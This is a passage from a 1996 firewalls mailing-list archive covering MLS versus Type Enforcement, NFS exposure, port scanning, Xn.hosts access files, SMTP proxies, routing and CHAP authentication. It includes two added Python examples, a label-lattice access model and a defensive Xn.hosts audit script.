level
  SYSHI      - audit data, sources
  RESTRICTED - sys admin sources, tools
  USER       - Access to internal network
  NETWORK    - Access to external/internet
  SYSTEM     - Executables, configurations, reference data

The more we looked at how to implement that architecture and provide other user services, the more complicated the picture became. We knew we would have to re/train the users in MLS concepts and what new functions they would need to understand and use to get data from one level to another.

Finally, I asked the question, WHAT ARE WE TRYING TO PROTECT? Everyone against themselves, or the integrity of the system?

Since we were trying to provide a raft of services that required a user account on the system (this was before socks and about 2 years before http appeared), we decided that the full blown environment would work, but it wouldn't serve the needs of the company or the users.

We changed the focus of the security policy. Protect the system integrity from attack. We decided that if we protected the operating system and server software, the executables and configurations, from unauthorized modification, we could prevent the majority of attacks from outside and inside that would disrupt the services we were trying to provide. We quit trying to use all of the MLS features to make absolutely sure that the servers and the users could NEVER interfere with each other.
Instead, we focused on providing a platform on which it would be extremely hard to subvert either the operating system or the servers, while providing as close a look and feel as possible to the non-MLS operating system. We couldn't easily regulate the flow of data between the inside and outside networks, between some of the subsystems, and between users without making the system labor intensive to make and maintain, so we decided to accept the risk of running the almost identical software run elsewhere. We did have to make some modifications to close some loopholes and make some programs run correctly in an MLS environment.

Since we couldn't spend days training new users on MLS concepts and commands, we created a system that was as close to the non-MLS version of the operating system as possible. Most users never really noticed the difference. The users that noticed the difference, or ran into a problem due to the MLS environment, were ones we wanted to talk to anyway. They were the ones trying to add a new service, or enhance existing ones. We had a few people join the ranks of the unofficial system admin crew by enlisting their aid in providing that service within the security profile of the system.

JGT
--
John G. Thompson jgt10@amdahl.com 1-408-992-2088
Amdahl Corporation, P.O. Box 3470 MS 383, Sunnyvale, CA 94088-3470
[The opinions expressed are MINE. They do not necessarily reflect the policies, procedures, press releases or opinions of the Amdahl Corporation.]
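Jeromie Jackson's two-level proxy layout (quoted above) and the thread's point that MLS labels carry non-hierarchical categories as well as levels can be checked mechanically with a small lattice model. This is an added example and not any list member's or vendor's code; the labels, the AUDIT category and the strict write-equal rule are assumptions of the example, chosen to match how MLS Unix systems of the period generally behaved.

```python
"""Lattice-label dominance for the o.proxies / i.proxies layout in the thread.

Added example, not code from any list member or product.  A label is
(level, categories); A dominates B when A's level >= B's AND A's categories
are a superset of B's.  Reads/writes are checked under Bell-LaPadula
confidentiality rules and under the Biba integrity dual that Rick Smith
mentioned earlier in the thread.
"""
from dataclasses import dataclass


@dataclass(frozen=True)
class Label:
    level: int
    cats: frozenset = frozenset()

    def dominates(self, other):
        """Lattice order: higher-or-equal level and superset of categories."""
        return self.level >= other.level and self.cats >= other.cats


# Bell-LaPadula confidentiality.  Writes use the strict *-property (write only
# at exactly your own label), as most MLS Unix systems enforce; the plain
# *-property would allow "write up", letting o.proxies write into the inside
# partition, which is exactly what Jackson's layout forbids.
def blp_can_read(subject, obj):
    return subject.dominates(obj)          # simple security: read down or equal


def blp_can_write(subject, obj):
    return subject == obj                  # strict *-property: write equal only


# Biba integrity is the dual: no read down, no write up.
def biba_can_read(subject, obj):
    return obj.dominates(subject)


def biba_can_write(subject, obj):
    return subject.dominates(obj)


# Constructed labels for Jackson's layout.  The AUDIT category is an assumption
# added to show what a purely hierarchical level scheme cannot express:
# i.proxies sits at the same level as the audit log yet must not read it.
NET = frozenset({"NET"})
LABELS = {
    "outside_if": Label(1, NET),
    "o.proxies":  Label(1, NET),
    "i.proxies":  Label(2, NET),
    "inside_if":  Label(2, NET),
    "audit_log":  Label(2, NET | {"AUDIT"}),
}


def access_matrix(rule_read, rule_write, labels=LABELS):
    """Return {(subject, object): 'rw' | 'r' | 'w' | '-'} under a rule pair."""
    out = {}
    for s_name, s_label in labels.items():
        for o_name, o_label in labels.items():
            r = "r" if rule_read(s_label, o_label) else ""
            w = "w" if rule_write(s_label, o_label) else ""
            out[(s_name, o_name)] = (r + w) or "-"
    return out


def can_relay(subject, src, dst, rule_read, rule_write, labels=LABELS):
    """True if `subject` may read data at `src` and then write it to `dst`,
    i.e. whether it can move data across the firewall in that direction."""
    s_label = labels[subject]
    return rule_read(s_label, labels[src]) and rule_write(s_label, labels[dst])


if __name__ == "__main__":
    for name, (rd, wr) in {"BLP": (blp_can_read, blp_can_write),
                           "Biba": (biba_can_read, biba_can_write)}.items():
        m = access_matrix(rd, wr)
        print(f"{name}: i.proxies on o.proxies = {m[('i.proxies', 'o.proxies')]}, "
              f"o.proxies on inside_if = {m[('o.proxies', 'inside_if')]}, "
              f"i.proxies on audit_log = {m[('i.proxies', 'audit_log')]}")
        print(f"{name}: outside->inside relay via o.proxies? "
              f"{can_relay('o.proxies', 'outside_if', 'inside_if', rd, wr)}; "
              f"via i.proxies reading o.proxies? "
              f"{can_relay('i.proxies', 'o.proxies', 'inside_if', rd, wr)}")
```

Under the Biba rules the direction flips: the higher-integrity i.proxies may not read the lower-integrity o.proxies at all, which is why the thread's proposal is a confidentiality-style flow and not an integrity one.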
From firewalls-owner Fri Feb 2 10:23:43 1996
Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-951222-1) id KAA11526 for firewalls-outgoing; Fri, 2 Feb 1996 10:16:27 -0800 (PST)
Received: from bastion.sware.com (bastion.sware.com [139.131.15.2]) by miles.greatcircle.com (8.7.1/Miles-951221-1) with SMTP id KAA11514 for ; Fri, 2 Feb 1996 10:16:21 -0800 (PST)
Received: from shlep.sware.com (shlep.sware.com [139.131.1.14]) by bastion.sware.com (8.6.12/8.6.5) with SMTP id JAA20420; Fri, 2 Feb 1996 09:02:51 -0501
Received: by shlep.sware.com (5.65/2.0) from mordred.sware.com id AA18926; Fri, 2 Feb 96 08:59:04 -0500
Received: by mordred.sware.com (5.65/2.1) id AA18008; Fri, 2 Feb 96 09:04:35 -0500
Message-Id: <9602021404.AA18008@mordred.sware.com>
Subject: Re: Mandatory protection (was: product selection)
To: smith@sctc.com (Rick Smith)
Date: Fri, 2 Feb 1996 09:04:35 -0500 (EST)
From: Charles Watt
Cc: firewalls@greatcircle.com, smith@sctc.com, watt@sware.com
In-Reply-To: <199602012355.RAA16089@shade.sctc.com> from "Rick Smith" at Feb 1, 96 05:55:26 pm
X-Mailer: ELM [version 2.4 PL21]
Content-Type: text
Sender: firewalls-owner@GreatCircle.COM
Precedence: bulk

>
> Charles Watt writes:
>
> >Actually, Rick, your analysis below does show a lack of
> >understanding in the capabilities of most MLS systems. Your
> >analysis assumes that the MAC labels enforced by such systems
> >are strictly hierarchical, e.g.:
>
> Excuse me, but I doubt you could do any of this without categories
> and/or compartments. I am surprised that you could infer their absence
> from that message. MLS couldn't come even close to competing with type
> enforcement if it lacked non-hierarchical labels.
>
> >Here your understanding of MLS networking breaks down. Read
> >the existing standards, such as RFC 1108 or the DoD's Common Security
> >Label spec.
>
> Naturally I've read various IPSO specs.
>
> Labeled IP is largely irrelevant to the firewalls marketplace today,
> and I suspect they will remain so for the next few years (perhaps an
> interesting topic for a different thread). We sell very, very little
> to sites that use labeled IP protocols. Most people need to
> interoperate with standard hosts operating without IPSO labels.

Rick, either everyone else on this list with experience in MLS systems is incapable of explaining a point clearly, or you have an amazing ability to ignore their points in your zeal to promote the Sidewinder and Type Enforcement (TE). But then, you are marketing, right?

Reread my message. It had nothing to do with labeled IP. It simply used the security features provided by a typical MAC-enforcing protocol stack to duplicate the features of a system based on TE. No labels for network data required.

Does this work? Of course. Our SecureWeb platform (www.secureware.com/papers/secureweb/) makes use of MAC to create the only platform truly secure enough for high value electronic commerce -- we have banks on the web today offering full-service accounts to their customers through the SWP. And when we ran our own "challenge" at the Retail Delivery Show in November (I take no responsibility for such disgusting marketing drivel), we at least had the confidence to offer a Trans Am convertible rather than a T-shirt to any successful attacker. And we gave all participants direct root access to the system (in the "outside" partition, of course).

> >Now I'm not an expert on Type Enforcement, but we do have a couple
> >of ex-SCC developers here. We've discussed the pros/cons of
> >TE vs. MLS at length for quite some time and have come to the conclusion
> >that ANYTHING that can be done with TE can also be done with MLS and
> >vice versa. Of course the architectures are different, and some
> >problems fit more naturally with one or the other approach. But the
> >capabilities are virtually identical, particularly when applied to
> >firewalls and similar separation problems.
>
> The bottom line is, of course, that both are forms of mandatory access
> control. We all agree on that point. (Hi, Barry).
>
> Rick.
> smith@sctc.com secure computing corporation

Fine. You've got a nice system. Its use of TE-based MAC gives it some definite competitive advantages over those systems that do not use MAC, if integrated and administered properly. But TE provides no advantage over a similar system based on MAC, such as the Harris firewall. There you must compete based upon other features, such as better application support or ease of administration.

Charles Watt
SecureWare, Inc.

From firewalls-owner Fri Feb 2 10:38:38 1996
Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-951222-1) id KAA11873 for firewalls-outgoing; Fri, 2 Feb 1996 10:29:07 -0800 (PST)
Received: from mprgate.mpr.ca (mprgate.mpr.ca [134.87.131.13]) by miles.greatcircle.com (8.7.1/Miles-951221-1) with SMTP id KAA11851 for ; Fri, 2 Feb 1996 10:28:12 -0800 (PST)
Received: from edzo.mpr.ca by mprgate.mpr.ca with SMTP id AA07683 (5.67b+/IDA-1.5 for ); Fri, 2 Feb 1996 10:25:19 -0800
Received: by edzo.mpr.ca (4.1/SMI-4.1) id AA23441; Fri, 2 Feb 96 10:26:39 PST
Date: Fri, 2 Feb 96 10:26:39 PST
From: igood@mprgate.mpr.ca (Ian Good)
Message-Id: <9602021826.AA23441@edzo.mpr.ca>
To: Firewalls@GreatCircle.COM
Subject: NFS services and firewalls
Sender: firewalls-owner@GreatCircle.COM
Precedence: bulk

Good morning (PST).

We have a requirement to provide a network mountable filesystem in a shared development environment between the firewalls of ours and another company. Our development team requests that this file system be mountable inside our firewall. Following is our proposed configuration. All of the NFS traffic between the server and the two companies should pass through the firewall. We are trying to protect the server as much as possible by putting it behind the firewall but still not inside; i.e., not on the same "side" of the firewall as the rest of the company.

                          _________
      us         -------|_  fw-1  _|---------        them
   NFS clients          |   \   /   |             NFS clients
                        |__\___/__|
                            __|___
                           | NFS  |
                           |server|
                           |______|

Is it possible for 'us' to achieve a high level of security for our internal network under this configuration? We understand that FW-1 v2.0 makes it possible to selectively pass NFS (v2) traffic through the firewall. We would make the server as secure as possible with almost no logins, functionally limited to the main task of serving NFS and only NFS mount connections permitted incoming from them. From our side to the server appropriate outgoing access for management and NFS client connections.

Can anyone comment on this configuration and the exposures inherent in it? How easy is it for someone to compromise internal hosts via the NFS server? If there is a serious problem with this, would using NFS (v3) significantly improve things?

Ian H. Good        (604) 293-5113        igood@mpr.ca
MPR Teltech Ltd.   fax (604) 293-5787    http://www.mpr.ca/
Burnaby BC Canada V5A-4B5

From firewalls-owner Fri Feb 2 10:56:53 1996
Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-951222-1) id KAA12554 for firewalls-outgoing; Fri, 2 Feb 1996 10:51:46 -0800 (PST)
Received: from uu6.psi.com (uu6.psi.com [38.145.155.3]) by miles.greatcircle.com (8.7.1/Miles-951221-1) with SMTP id KAA12549 for ; Fri, 2 Feb 1996 10:51:42 -0800 (PST)
Received: from va.arca.com by uu6.psi.com (5.65b/4.0.071791-PSI/PSINet) via UUCP; id AA14947 for ; Fri, 2 Feb 96 13:43:59 -0500
From: williams@va.arca.com (Jeff Williams)
Reply-To: williams@va.arca.com
To: Firewalls@GreatCircle.COM
Subject: Firewall API's
Date: 02 Feb 1996 17:46:49 GMT
Message-Id: <256176126.339531179@va.arca.com>
Organization: Arca Systems, Inc
Sender: firewalls-owner@GreatCircle.COM
Precedence: bulk

We're in the middle of a firewall selection effort and we need some help. We're wondering whether or not it is common practice to provide an API so that we can create our own proxy applications if we want to. At least one vendor has said "No way". Is it reasonable to expect such an API with a firewall product? What's the best way to find out which ones do or do not?

Thanks in advance for any help,

--Jeff

From firewalls-owner Fri Feb 2 11:16:30 1996
Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-951222-1) id KAA12293 for firewalls-outgoing; Fri, 2 Feb 1996 10:41:16 -0800 (PST)
Received: from real.com ([199.97.122.1]) by miles.greatcircle.com (8.7.1/Miles-951221-1) with ESMTP id KAA12287 for ; Fri, 2 Feb 1996 10:41:12 -0800 (PST)
Date: Fri, 2 Feb 1996 18:42:42 GMT
From: bret@real.com (Bret McDanel)
Received: by real.com (8.7.3/3.2.012693-Realistic Technologies); id SAA04935 for firewalls@greatcircle.com; Fri, 2 Feb 1996 18:42:42 GMT
Message-Id: <199602021842.SAA04935@real.com>
To: firewalls@greatcircle.com
Subject: Re: Scanning from afar...
X-Sun-Charset: US-ASCII
Sender: firewalls-owner@GreatCircle.COM
Precedence: bulk

> Has anyone seen this type of network scanning before? Addresses have been
> changed to protect the innocent and the guilty.
>
> Jan 30 11:14:41.922: %SEC-6-IPACCESSLOGP: list 111 denied tcp
> X.X.143.14(39620) -> X.X.211.227(80), 1 packet
>
> The node in question here has scanned a few other subnets looking for
> connections to port 80. Is this a recognised scanning program or something
> home grown?
>

It looks like someone is scanning for HTTPD.. Maybe someone is really anxious to read your web pages :)

From firewalls-owner Fri Feb 2 11:27:53 1996
Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-951222-1) id LAA13063 for firewalls-outgoing; Fri, 2 Feb 1996 11:06:55 -0800 (PST)
Received: from relay3.UU.NET (relay3.UU.NET [192.48.96.8]) by miles.greatcircle.com (8.7.1/Miles-951221-1) with ESMTP id LAA13058 for ; Fri, 2 Feb 1996 11:06:49 -0800 (PST)
Received: from maestro.Maestro.COM by relay3.UU.NET with SMTP id QQabfg23307; Fri, 2 Feb 1996 14:05:52 -0500 (EST)
Received: by maestro.Maestro.COM (4.1/MAESTRO-0.1/07-03-93) id AA14540; Fri, 2 Feb 96 13:55:22 EST
Date: Fri, 2 Feb 1996 13:55:21 -0500 (EST)
From: Sick Puppy
To: firewalls@GreatCircle.com
Subject: Re: Scanning from afar
Message-Id:
Mime-Version: 1.0
Content-Type: TEXT/PLAIN; charset=US-ASCII
Sender: firewalls-owner@GreatCircle.COM
Precedence: bulk

Looks a bit similar to ICMP redirect packets, which are basically telling your router that the shortest route to one system is through another system (where some kewl d00d usually waits for your packets). A lot of lamers can't tell the difference between a router and a firewall so they hit the firewall with router tewlz. Definitely ! 3L33T. (Not elite, lamer.)

I was watching some d00d from .my doing this kind of stuff, but he was elite and kept seeing me watch him. Each time I connected to his system he bailed out. Don't care anyway. It don't matter that a dawg don't know where .my is.

Sick Puppy, the Cat_Eating_Dawg
Photonic & Tachyonic Systems Engineer of the Stealth Starship Dark Matter
-=:( Chained, whipped, beaten and severely abused in Hillary's Dungeon ):=-
-=:( Yeah, that's it, beg Mother Newt ):=-
Stop it Bill. NO Bill. Ooooh Bill. Yes Bill. Right there Bill.
(Gotcha. Bill was only stroking the cat)

From firewalls-owner Fri Feb 2 11:33:26 1996
Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-951222-1) id KAA12642 for firewalls-outgoing; Fri, 2 Feb 1996 10:54:42 -0800 (PST)
Received: from solen.gac.edu (solen.gac.edu [138.236.1.6]) by miles.greatcircle.com (8.7.1/Miles-951221-1) with SMTP id KAA12624 for ; Fri, 2 Feb 1996 10:54:25 -0800 (PST)
Received: from gac.edu (guenther@lunen.gac.edu [138.236.128.17]) by solen.gac.edu (8.6.12/8.6.12) with ESMTP id MAA12094; Fri, 2 Feb 1996 12:49:12 -0600
Message-Id: <199602021849.MAA12094@solen.gac.edu>
To: Prakash N Purushotham
cc: "'firewalls@greatcircle.com'"
Subject: Re: X#.hosts in /etc directory
In-reply-to: Your message of "Fri, 02 Feb 1996 09:23:00 PST." <31124A6A@gangotri.mindware.soft.net>
Date: Fri, 02 Feb 1996 12:49:10 -0600
From: Philip Guenther
Sender: firewalls-owner@GreatCircle.COM
Precedence: bulk

Prakash N Purushotham writes:
>Yesterday when I was backing up my DNS databases and Mail databases,
>I found several instances of files with names
>
>X0.hosts, X1.hosts .... X7.hosts
>
>All these files were created on 27 Jan, 1996 (Saturday, non-working day)
>with nearly same time-stamps.
>
>Could this mean that my network is under attack? I did not find
>anything suspicious in the syslog and sulog files.

Your machine probably is under attack. To quote the Xserver manpage:

    The X server also uses a host-based access control list for
    deciding whether or not to accept connections from clients on a
    particular machine. If no other authorization mechanism is being
    used, this list initially consists of the host on which the server
    is running as well as any machines listed in the file /etc/Xn.hosts,
    where n is the display number of the server. The file contains
    either an Internet hostname (e.g. expo.lcs.mit.edu) or a DECnet
    hostname in double colon format (e.g. hydra::). Each hostname must
    be newline separated with no leading or trailing whitespace. For
    example:

        joesworkstation
        corporate.company.com
        star::
        bigcpu::

    Users add or remove hosts from this list and enable or disable
    access control using the xhost command from the same machine as
    the server.

If those files contain any hostnames, you are susceptible to X connections from those hosts. Remove the files and restart your Xserver immediately.

Philip Guenther
----------------------------------------------------------------
Philip Guenther                 UNIX Systems and Network Administrator
Internet: guenther@gac.edu      Phonenet: (507) 933-7596
Gustavus Adolphus College       St. Peter, MN 56082-1498
Source code never lies (it just misleads).  (Programming by Purloined Letter?)
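The manpage text Philip quotes fixes the file format exactly: one hostname per line, no leading or trailing whitespace, DECnet names ending in `::`, file name `X<display>.hosts`. An administrator who finds such files wants to know, per display, which hosts have been granted cookie-less access and whether any entry is malformed. The following audit script is an added example written for this thread, not something Philip or the X distribution provides; the function names (`parse_xhosts`, `audit_xhosts`, `scan_etc`) and the sample files are constructed here. It goes slightly beyond the quoted example by also flagging lines that violate the format, since a line the X server would reject is still worth a look.

```python
"""Audit /etc/Xn.hosts files using the format from the Xserver manpage.

Added example for the thread above; not code from the poster or from the
X distribution. Function names and the SAMPLE data are constructed.
"""
import re
from pathlib import Path

# File names of interest: X followed by the display number, then ".hosts".
XHOSTS_RE = re.compile(r"^X(\d+)\.hosts$")
# Hostname characters accepted for Internet or DECnet node names.
NAME_RE = re.compile(r"[A-Za-z0-9.\-]+")


def parse_xhosts(text):
    """Parse one Xn.hosts body into (hosts, problems).

    hosts    : list of (name, kind) with kind 'internet' or 'decnet'.
    problems : list of (lineno, reason, raw_line) for lines that break the
               manpage rule (no leading/trailing whitespace, one name per line).
    """
    hosts, problems = [], []
    for lineno, raw in enumerate(text.split("\n"), 1):
        if raw == "":
            continue                      # trailing newline or empty file
        if raw != raw.strip():
            problems.append((lineno, "leading/trailing whitespace", raw))
            continue
        kind = "decnet" if raw.endswith("::") else "internet"
        name = raw[:-2] if kind == "decnet" else raw
        if not name or not NAME_RE.fullmatch(name):
            problems.append((lineno, "not a hostname", raw))
            continue
        hosts.append((name, kind))
    return hosts, problems


def audit_xhosts(files):
    """files: mapping of file name -> file contents (as found in /etc).

    Returns {display_number: {"hosts": [...], "problems": [...], "exposed": bool}}.
    A display is 'exposed' when at least one valid hostname is listed, since
    every client on such a host may connect without any other authorization.
    """
    report = {}
    for fname, content in files.items():
        m = XHOSTS_RE.match(fname)
        if not m:
            continue                      # ignore unrelated files in the directory
        hosts, problems = parse_xhosts(content)
        report[int(m.group(1))] = {
            "hosts": hosts,
            "problems": problems,
            "exposed": bool(hosts),
        }
    return report


def scan_etc(etc_dir="/etc"):
    """Read the real files from a directory and audit them."""
    files = {p.name: p.read_text() for p in Path(etc_dir).iterdir()
             if XHOSTS_RE.match(p.name)}
    return audit_xhosts(files)


# Constructed sample: the manpage's own example list for display 0, an empty
# file for display 1, a malformed entry for display 7, and one unrelated file.
SAMPLE = {
    "X0.hosts": "joesworkstation\ncorporate.company.com\nstar::\nbigcpu::\n",
    "X1.hosts": "",
    "X7.hosts": " sloppy.example \n",
    "passwd": "root:x:0:0::/:/bin/sh\n",
}

if __name__ == "__main__":
    for display, info in sorted(audit_xhosts(SAMPLE).items()):
        state = "EXPOSED" if info["exposed"] else "ok"
        print(f"display {display}: {state}, hosts={info['hosts']}, problems={info['problems']}")
```

Run `scan_etc()` on the real machine to get the same report for `/etc`; an empty `Xn.hosts` grants nothing, so the interesting output is any display marked exposed, together with the hostnames that were granted access.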
From firewalls-owner Fri Feb 2 13:27:11 1996 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-951222-1) id MAA17118 for firewalls-outgoing; Fri, 2 Feb 1996 12:53:45 -0800 (PST) Received: from dcb01a.cwi.net (dcb01a.cwi.net [205.136.1.65]) by miles.greatcircle.com (8.7.1/Miles-951221-1) with SMTP id MAA17113 for ; Fri, 2 Feb 1996 12:53:37 -0800 (PST) Received: (from chris@localhost) by dcb01a.cwi.net (8.6.9/8.6.9) id PAA07595; Fri, 2 Feb 1996 15:52:42 -0500 Date: Fri, 2 Feb 1996 15:52:42 -0500 From: Chris Eastman Subject: proxy smtp To: firewalls@greatcircle.com Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: firewalls-owner@GreatCircle.COM Precedence: bulk Earlier there was a post about a socks-type smtp relay client, basically what I want to do is have an external machine for mail only, and have the forward all traffic for a particular domain to an internal NT machine, anyone have any suggestions as to which proxy type application to use for this? 
%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%% %% Christopher Eastman %% Cable & Wireless, Inc %% %% MDS Network Engineer %% 1919 Gallows Road %% %% chris@cwi.net %% Vienna, VA 22182 %% %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%% From firewalls-owner Fri Feb 2 13:27:24 1996 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-951222-1) id MAA16995 for firewalls-outgoing; Fri, 2 Feb 1996 12:50:21 -0800 (PST) Received: from relay1.smtp.psi.net (relay1.smtp.psi.net [38.8.14.2]) by miles.greatcircle.com (8.7.1/Miles-951221-1) with SMTP id MAA15254 for ; Fri, 2 Feb 1996 12:17:47 -0800 (PST) Received: from adpmail.adp-es.com by relay1.smtp.psi.net (8.6.12/SMI-5.4-PSI) id PAA08800; Fri, 2 Feb 1996 15:16:50 -0500 Received: from ccMail by adpmail.adp-es.com (IMA Internet Exchange 1.04b) id 1126f930; Fri, 2 Feb 96 15:09:55 -0500 Mime-Version: 1.0 Date: Fri, 2 Feb 1996 14:58:05 -0500 Message-ID: <1126f930@adp-es.com> From: jtriana@adp-es.com (Jorge Triana) Subject: Help with Sun-OS/Raptor Firewall To: firewalls-digest@GreatCircle.COM Content-Type: text/plain; charset=US-ASCII Content-Transfer-Encoding: 7bit Content-Description: cc:Mail note part Sender: firewalls-owner@GreatCircle.COM Precedence: bulk I'm hopefule of 2 things: First- I'm posting to right area(if not, nicely tell me where to go) Secondly- Hope someone can help!!!!! I have a Raptor Eagle 3.0 firewall running on a Sun SparcStation 2.0 running SunOS 4.1.4, (SOLARIS VERSION COMING SOON). The machine has two token ring cards, one for each of the net sides, unprotected and protected). On the protected internal network side, I have a cisco router that is my gateway to the rest of the internal network. I am running IGRP in the internal network and also RIP on that router so that all my routing tables are redistributed into the ring where the Sun is connected to. 
On the unprotected side going to the internet, I have another cisco router running rip and going out to the rest of the world. My problem is such: From the SUN workstation, I can ping to the outside world, internet and such with out a problem. I have routes to the rest of the world. I can't however, ping anything beyond my directly connected devices that are on the protected ring. That is, any other subnet that is not directly connected to the subnet where the sun is, is not accessible. Doing a netstat -rn shows only the two directly connected subnets, the loopback and the default router entry. I'm not running any DNS or YP or BIND on this machine or anywhere else. I have an /etc/domainrouter entry with it being the router going to the internet. (IF I change and make the default router the oine going to my internal network, then I can ping internally, but nothing out in the internet). If I have to default router entry, then it starts routed and things really get interesting. (SEE BELOW) I have a sniffer on the protected ring and I see the RIP route broadcasts eminating from the cisco router into the ring. I dont' see the SUN doing anything but exchanging MAC address information. There is no RIP traffic coming from the SUN workstation. (I thought that SUN w/stations normally run RIP to formulate their routing tables!!) I have done the following with the following results: - Removed the default router entry.... Doing this, causes routed to start. Before routed starts, there is no traffic eminating from the workstation. As soon as I type routed -q and hit enter, the workstation gets over 100 rip-devired routes to him forwarded by the router. The sun box shows the entries when a netstat -rn command is entered. After approx 1 minute, the routing tables are flushed in the sun and only 24 routes are kept. These 24 routes are being sent by the router every 30 seconds as part of the RIP update. 
The sun never seems to acknolwedge the route packet, so the route keeps sending the same. The only time that the SUN workstation is caching the routes is when the routed command is issued, and then the routes are flushed after 1 minute. I have added static route to the inside network with no sucess. Does anybody have any ideas? Please reply to jtriana@adp-es.com..... Thanks...for any help.. From firewalls-owner Fri Feb 2 13:57:43 1996 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-951222-1) id MAA16961 for firewalls-outgoing; Fri, 2 Feb 1996 12:50:05 -0800 (PST) Received: from uustar.starnet.net (uustar.starnet.net [199.217.253.12]) by miles.greatcircle.com (8.7.1/Miles-951221-1) with SMTP id LAA14535 for ; Fri, 2 Feb 1996 11:52:56 -0800 (PST) Received: from hq.UUCP by uustar.starnet.net with UUCP id AA13519 (5.67b/IDA-1.5 for greatcircle.com!firewalls); Fri, 2 Feb 1996 13:41:13 -0600 Received: (from daemon@localhost) by hq.agedwards.com (8.6.9/8.6.9) id NAA03023 for firewalls@greatcircle.com.outbound; Fri, 2 Feb 1996 13:30:43 -0600 Received: from igate.agedwards.com (igate.agedwards.com [159.45.56.11]) by hq.agedwards.com (8.6.9/8.6.9) with ESMTP id NAA03019 for ; Fri, 2 Feb 1996 13:30:41 -0600 Received: from Microsoft Mail (PU Serial #1093) by igate.agedwards.com (PostalUnion/SMTP(tm) v2.1.8c for Windows NT(tm)) id AA-1996Feb02.132500.1093.27907; Fri, 02 Feb 1996 13:27:17 -0600 From: nicholscs@agedwards.com (Nichols,Christopher) To: firewalls@greatcircle.com ('SMTP: firewalls@greatcircle.com') Message-Id: <1996Feb02.132500.1093.27907@igate.agedwards.com> X-Mailer: Microsoft Mail via PostalUnion/SMTP for Windows NT Mime-Version: 1.0 Content-Type: text/plain; charset="US-ASCII" Organization: A.G. Edwards & Sons Inc. St. 
Louis Date: Fri, 02 Feb 1996 13:27:17 -0600 Subject: CHAP Authentication Sender: firewalls-owner@GreatCircle.COM Precedence: bulk This is a general security related question relating to incoming communications into a router. Specifically a remote user dialing into a router attached to an applications server. I have to make an argument comparing/contrasting the security levels between CHAP authentication and Token Authentication. The argument has been successfully made that Token authentication is generally considered to provide superior authentication. From a management viewpoint the question becomes - CHAP is basically free (manhours and implementation) vs. Token which can be expensive - therefore tell us why CHAP is inferior to Tokens for perimeter security? What threats does CHAP pose? Has CHAP been successfully penetrated? By what methods? I have read the RFC's on PPP and Authentication but am still unable to apply this to a real world threat. Thanks, Chris nicholscs@agedwards.com From firewalls-owner Fri Feb 2 14:11:40 1996 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-951222-1) id MAA16934 for firewalls-outgoing; Fri, 2 Feb 1996 12:49:41 -0800 (PST) Received: from vent.pipex.net (vent.pipex.net [158.43.128.5]) by miles.greatcircle.com (8.7.1/Miles-951221-1) with SMTP id FAA03424 for ; Fri, 2 Feb 1996 05:48:48 -0800 (PST) Received: from unknown by vent.pipex.net (8.6.12/PIPEX simple 1.20) id NAA01067; Fri, 2 Feb 1996 13:46:46 GMT Message-ID: To: Firewall List MIME-Version: 1.0 From: Ian Johnstone-Bryden Subject: Re: Mandatory protection (was: product selection) Date: Fri, 02 Feb 96 11:55:29 GMT Content-Type: text/plain; charset=US-ASCII; X-MAPIextension=".TXT" Content-Transfer-Encoding: 7bit Sender: firewalls-owner@GreatCircle.COM Precedence: bulk Reading the exchange on Multi Level Security vs Type Enforcement the two factors which come out strongly are the vendor vested interests and the way DOD does things. 
Vendor vested interest is understandable. If anyone invests time and money in working with a particular architecture they should believe in what they are doing and have a strong opinion, right or wrong. Where the vendor is a hardware supplier, the primary interest is in selling the hardware. The software component is just a means to an end. In todays environment of cloned product, open systems (UNIX), and quazi open systems (Microsoft), it can be tough differentiating a hardware product. Some of the small hardware vendors have followed a series of attempts to sell product by packing Ada, or real-time UNIX, or today firewall software in the hope that this will enable them to sell well designed and manufactured hardware which happens to be rather more costly than commodity product in their field. If that helps them sell tin, good luck to them. OTOH maybe they need to take a hard look at what they are trying to achieve, how they are costing product, and how they are trying to market it. In some cases they would have achieved greater success by ceasing hardware production and developing their software skills, but then so few organisations spend time creating the enterprise policy which makes them question and review against a prime objective. Vendor vested interest aside, how US DOD does things does not decide how technology can be best employed to solve specific problems in specific cases. It doesnt even mean that a US DOD approach is the best option even within DOD. When TCSEC was developed, it was originally intended to form a general computing standard, but it just happened to become a government mechanism and ended up more as a US Federal G procurement mechanism than a method of addressing risk. Because of organisations like NATO, TCSEC got exported and particular countries, like the UK, found that it didnt do everything they felt they needed. 
Result was they set up they own systems, but based them on TCSEC in recognition that much of their computer hardware, if not their software, came from US based corporations that handled trusted products through their Fed Sales teams. Although there have been many invitations down the years, the general IT industry and commerce have failed to participate strongly in the development of computer security criteria. Thats resulted in criteria being written mainly in government and academic language. In turn that makes it very easy for people to try to think within the constraints of someone else's box - but you dont have to. The application of technology can be more important than the technology. After all IBM didnt conceive the technology of the PC just to make Bill Gates rich. That happened because Bill saw some opportunities and ruthlessly pursued them. If we take the time to look back through history, some of the greatest advances have been made by applying technology in ways which the original developer never intended. MLS was originally designed for a specific perceived government need and directly related to the heirarchical structure of government classification systems. The weakness of that approach in commercial applications is that much traditional government business is done within that organisation and even within a sub-set. DOD shares a classification system with the rest of the US Government but may apply it differently. It may also deal with other external organisations like NATO and UK Government. Theoretically the classification system is universal. In reality it isnt. The US and UK Governments continue to confuse each other by using similar classification terms to mean different things and having some unique classifications. Even in simplified examples, classification is not truly heirarchical. A data item classified 'Secret' is not available to every person who is cleared to read up to and including 'Secret'. 
